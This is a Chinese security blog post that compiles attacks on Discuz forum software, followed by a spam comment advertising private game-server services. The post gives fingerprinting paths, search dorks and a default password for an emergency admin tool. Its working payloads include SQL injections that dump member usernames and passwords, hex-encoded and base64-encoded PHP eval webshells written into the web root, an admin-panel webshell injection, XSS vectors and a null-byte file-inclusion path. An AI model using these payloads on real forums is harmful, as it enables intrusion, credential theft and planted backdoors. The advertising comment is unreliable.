Discuz论坛漏洞总结

众所周知 dz论坛相对来说是比较安全的  但是也不可以说无坚不摧

Google关键字以及常有目录:

#范例:链接------关键字------CMS别称

#范例:连接------正则表达式------匹配关键字------CMS别称

/------Powered by.*?<------Discuz!------Discuz(康盛)

/------Powered by.*?</a></strong>------Discuz!------Discuz(康盛)

/robots.txt------discuz------Discuz(康盛)

/bbcode.js------discuz------Discuz(康盛)

/newsfader.js------discuz------Discuz(康盛)

/templates.cdb------discuz------Discuz(康盛)

/u2upopup.js------discuz------Discuz(康盛)

/admin/discuzfiles.md5------discuz------Discuz(康盛)

/api/manyou/cloud_channel.htm------discuz------Discuz(康盛)

/images/admincp/admincp.js------discuz------Discuz(康盛)

/include/javascript/ajax.js------discuz------Discuz(康盛)

/mspace/default/style.ini------discuz------Discuz(康盛)

/plugins/manyou/discuz_plugin_manyou.xml------discuz------Discuz(康盛)

/source/plugin/myapp/discuz_plugin_myapp.xml------discuz------Discuz(康盛)

/static/js/admincp.js------discuz------Discuz(康盛)

/template/default/common/common.css------discuz------Discuz(康盛)

/uc_server/view/default/admin_frame_main.htm------discuz------Discuz(康盛)

/bbcode.js------discuz------Discuz(康盛)

/newsfader.js------discuz------Discuz(康盛)

/templates.cdb------discuz------Discuz(康盛)

/u2upopup.js------discuz------Discuz(康盛)

/mspace/default1/style.ini------discuz------Discuz(康盛)

/uc_server/view/default/admin_frame_main.htm------discuz------Discuz(康盛)

 

Discuz的基本漏洞:

discuz x1.5 discuz 7.2 后台getshell 0day通杀0day

Discuz 某插件SQL注入漏洞

Discuz! 7.1 & 7.2 远程代码执行漏洞

discuz! 7.2 manyou插件暴路径&Get Webshell 0day

Discuz! 7.2-X1 心情墙插件SQL注入及持久型XSS漏洞

Discuz!账号发放插件注入0day

Discuz7.X通杀0day漏洞(UCenter Home-2.0)

 

1,  dz-ychat插件注入漏洞

漏洞链接:https://www.hackxc.cc/plugin.php?id=ychat&mod=rooms&cid=6x

2,  dz-sql注入

漏洞链接:https://www.hackxc.cc/faq.php?action=...

3, 源代码外泄下载导致漏洞的发生

漏洞链接:https://www.hackxc.cc/bbs.tar.gz

4,  Discuz急诊箱没有关闭,默认密码188281MWWxjk即可登录

漏洞链接:https://www.hackxc.cc/source/plugin/tools/tools.php

5,  Discuz弱口令导致漏洞的发生

漏洞链接:https://www.hackxc.cc/uc_server/admin.php

 

https://www.hackxc.cc/uc_server/admin.php?

sid=b962WHAGm3MydvyKLeEcvoQSS7pPPjkGuZTz270fNQqi5F6HeOsah6osA7nzMTxlpuiMuJAz

3%2BZADQ  弱口令admin

6,  discuz X2.5

漏洞描述:广播回复存在 xss漏洞 html、脚本未过滤

7,  discus x2 SQL注入漏洞

漏洞链接:https://www.hackxc.cc/source\module\forum\forum_attachment.php

8,  基本的路径的文件

/uc_server/control/admin/db.php

/source/plugin/myrepeats/table/table_myrepeats.php

/install/include/install_lang.php

9,  dz x1.5  dzx7.2漏洞

后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件并同时勾选上 允

许导入不同版本 Discuz! 的插件(易产生错误!!)

shell地址就为:data/plugindata/shell.lang.php(discuz x1.5 )

shell地址就为:forumdata/plugins/shell.lang.php (discuz 7.2)

10,Discuz7.X通杀0day漏洞(UCenter Home-2.0)

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&amp;shopid=

       Vuln file : Shop.php

Poc文件

shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select 

(select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from 

information_schema.tables limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a) and 1=1

11, dz账号发放插件注入0day

2Fly 序号发放系统

文件2fly_gift.php

Exp文件

Exp:https://www.hackxc.cc/2fly_gift.php?pages=content&gameid=16 and 1=2 

union select 1,2,3,4,concat

(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2

4,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members

关键字查找:

inurl:2fly_gift.php

12,dz7.2 心情墙插件

存在xss插件,持久性的

在发表心情处直接插入html代码

“><script>alert(/xss/)</script>

Sql注入网站,比较鸡肋,已经差不多没有le

漏洞链接:https://www.hackxc.cc/plugin.php?

id=moodwall&action=edit_mood&moodid=2

 

13,dz manyou插件暴路径

文件./manyou.source/notice.php

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' 

union select 

NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E

,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

14,dz备份文件的一些基本的路径

/config/config_global.php.bak

/config/config_ucenter.php.bak

/config.inc.php.bak

15,dz6.1后台拿shell

http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yes

admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入

webshell

<?php eval($_POST[cmd]);?>

后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php

后台模板管理--默认模板套系--详情

templates/default/actions.lang.php

jhackj\\');eval($_POST[cmd])?>;//

16,Discuz X2.5 最新GetShell 0day 详细利用方法

在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。

要成功利用此漏洞需要目标启用seo功能。

 漏洞文件:upload\source\class\helper\helper_seo.php

 在后台设置了,前台就能通过添加特殊内容进行命令执行

 先上图后上代码 大家目测吧

下面说下利用方法

1).注册任意账户

2).登陆用户,发表blog日志(注意是日志

3).添加图片,选择网络图片,地址写入 ↓

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode

(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4).访问日志,论坛根目录下生成demo.php,一句发密码c

漏洞要开启seo,并且开启用户日志的seo,漏洞鸡肋,黑站就算了。

补充一下吧,开seo没错,但是并非他说的非得开日志的seo,我上面文章中说的“各种

地方比如 source/include/space/space_blog.php,

懂的都懂了”只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单

的,论坛找个板块发贴子就行,

这主要看管理员开启了哪个位置的seo,如果不知道管理员开了哪的seo就到处都发一下



利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴

子,内容

${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr

(40).chr(41).chr(59))}}

然后给他加上任意超链接,发布即可phpinfo(),enjoy it :)

17,[email]2” onmouseover=”alert(2)[/email]

Xss漏洞

注入一个用户,然后发表新的日志,插入这句话,然后我们点击编辑,就弹出来了

18,dz x3.1越权回帖

当我们访问一个论坛的时候,可能会有一些可能需要vip会员,不能回复帖子,咋办,

我们点击下面的分享,然后,点击同时回复,我们就回复成功了,成功的看到了隐藏的

文件

19,某插件存在漏洞

Inurl:plugin.php?id=dc_mail

使用文件包含来操作

**/plugin.php?

action=../../../../../data/attachment/forum/201508/02/201508/02/153404ryzl4y

ytgyz4yjrl.jpg%00&id=dc_mall

20,强制回复

点击回复帖子,发现不能回复,F12,然后我们修改下面的<a href>修改成

<a href="https://www.hackxc.cc//forum.php?

mod=post&amp;action=reply&amp;fid=170&amp;tid=9310" onclick="showWindow('repl 

y', this.href)">回复</a>

然后再次点击回复帖子

21,好货站长联盟插件注入

点击导入已有接口信息

在App Key出添加一句话1234’);eval($_POST[1]);//

接着找/data/dzapp-haodai-config.php

然后就shell了

访问/data/dzapp-haodai-config.php,下面1=phpinfo()


补充:DiscuzX <= 3.4  前台任意文件删除漏洞

本博客所有文章如无特别注明均为原创。作者:小陈复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全
原文地址《Discuz论坛漏洞总结
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(2)

天龙sf全套-奇迹Musf全套-魔兽sf全套-魔域sf全套-墨香sf全套
天堂2sf全套-传奇3sf全套-英雄王座sf全套-千年sf全套-征途sf全套
新魔界sf全套-骑士sf全套-烈焰sf全套-破天sf全套-决战sf全套
美丽世界sf全套-乱勇OLsf全套-倚天2sf全套-完美世界sf全套-征服sf全套
天堂sf全套-传世sf全套-真封神sf全套-劲舞团sf全套-天上碑sf全套
永恒之塔sf全套-仙境ROsf全套-诛仙sf全套-神泣sf全套-石器sf全套
冒险岛sf全套-惊天动地sf全套-热血江湖sf全套-问道sf全套-密传sf全套
火线任务(Heat Project)sf全套-飞飞OLsf全套-洛汗sf全套-天之炼狱sf全套
丝路传说sf全套-大话西游sf全套-蜀门sf全套-机战sf全套-剑侠情缘sf全套
绝对女神sf全套-传说OLsf全套-刀剑sf全套-弹弹堂sf全套-科洛斯sf全套
魔力宝贝sf全套-武林外传sf全套-网页游戏sf全套-页游sf全套-希望OLsf全套
成吉思汗sf全套-剑侠世界sf全套-全民奇迹sf全套-挑战OLsf全套
红月sf全套-十二之天(江湖OL)sf全套-倚天sf全套-dnfsf全套

24小时电话扣扣服务保证客户随时找到技术员随时解决SF一条龙的各种问题
专业从事私服一条龙服务,我们用最专业的技术,贴心的售后服务,放心质量
请加入我们的私服一条龙开区行列,了解我们,信赖我们,品质来源于责任细节
客户们的满意是我们追求的目标,以诚信为本,为您打造属于您的私服.
想开个好F就来46em.com!想要服务器不卡就来46em.com!
想要售后好就来46em.com!想要技术硬,学技术就来www.46em.com!

服务器以及空间租用**私服服务端出售一条龙-私服套餐-代理广告
版本介绍-开区模版-服务器租用
官方网站www.46em.com
客服咨询QQ1124999543(企鹅扣扣)
Email:[email protected]

www.46em.com商业服务端版本下载地址(已修复不能下载问题):
www.46em.com/soft/index.html
魔域sf一条龙服务端_46em.com 墨香私服一条龙服务端_46em.com 征途开服一条龙制作_46em.com
天堂2sf一条龙开服www.05mx.com天堂2sf一条龙开服www.05mx.com-客服咨询QQ1207542352(企鹅扣扣)-Email:[email protected] 科洛斯一条龙www.05mx.com
GX 4周前 (2018-04-30) 回复